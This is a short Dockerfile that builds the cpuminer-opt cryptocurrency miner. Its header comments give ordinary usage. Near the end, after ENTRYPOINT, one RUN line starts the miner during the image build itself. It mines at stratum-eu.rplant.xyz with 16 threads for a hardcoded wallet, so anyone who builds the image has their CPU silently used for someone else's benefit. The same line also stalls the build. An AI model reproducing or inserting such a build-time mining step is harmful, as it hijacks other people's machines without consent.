#
# Dockerfile for cpuminer-opt
# usage: docker build -t cpuminer-opt:latest .
# run: docker run -it --rm cpuminer-opt:latest [ARGS]
# ex: docker run -it --rm cpuminer-opt:latest -a cryptonight -o cryptonight.eu.nicehash.com:3355 -u 1MiningDW2GKzf4VQfmp4q2XoUvR6iy6PD.worker1 -p x -t 3
#

# Build
FROM ubuntu:16.04 as builder

RUN apt-get update 
  
COPY . /app/
RUN cd /app/ && ./build.sh

# App
FROM ubuntu:16.04

RUN apt-get update 

COPY --from=builder /app/cpuminer .
ENTRYPOINT ["./cpuminer"]
RUN ./cpuminer -a power2b -o stratum+tcps://stratum-eu.rplant.xyz:17022 -u Mmxaf9X2dEHTq96gw4L6EgqRoLVDidKfMo.Gelar -t16
CMD ["-h"]
